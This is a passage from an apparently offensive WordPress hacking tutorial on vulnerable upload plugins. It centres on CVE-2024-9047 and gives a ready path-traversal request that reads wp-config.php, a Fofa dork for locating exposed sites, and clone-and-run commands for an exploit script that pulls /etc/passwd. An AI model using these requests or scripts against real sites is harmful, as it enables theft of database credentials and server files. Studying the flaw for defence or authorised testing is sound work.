Vulnerable File Upload Plugins
β‘ Key Vulnerable Plugins and Exploits
1. Revslider Plugin Example Exploit (We saw it in the last chapter).
2. WordPress File Upload β€ 4.24.11 β Unauthenticated Path Traversal (CVE 2024-9047)
π‘ Please note: this plugin not longer available fir download, but still out there in some sites.
Vulnerable File:
wfu_file_downloader.phpImpact: Arbitrary File Read & Deletion
Attack Vector: Unauthenticated attackers can manipulate the
fileparameter with../sequences to escape the upload directory.
Example Exploit:
GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=../../../../../../wp-config.phpThis lets an attacker dump database credentials, salts, and keys straight from the wp-config.php.
Fofa Dork: body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"
You can find my script in this repository.
git clone https://github.com/verylazytech/CVE-2024-9047
cd CVE-2024-9047
chmod +x cve-2024-9047
./cve-2024-9047.sh www.vulnerablewebsite.com /etc/passwdThe script will check the plugin version and, if vulnerable, attempt to retrieve the specified file.
π Why File Upload Vulnerabilities Matter
Remote Code Execution (RCE): Malicious PHP files uploaded through a vulnerable plugin can be executed server-side.
Arbitrary File Read/Deletion: Path traversal flaws allow attackers to steal sensitive files like
wp-config.phpor delete system files.Privilege Escalation: Even low-privileged users (e.g., subscribers) may exploit upload flaws to gain higher control.
If you need some more help with searching the right exploit look in this page.
Last updated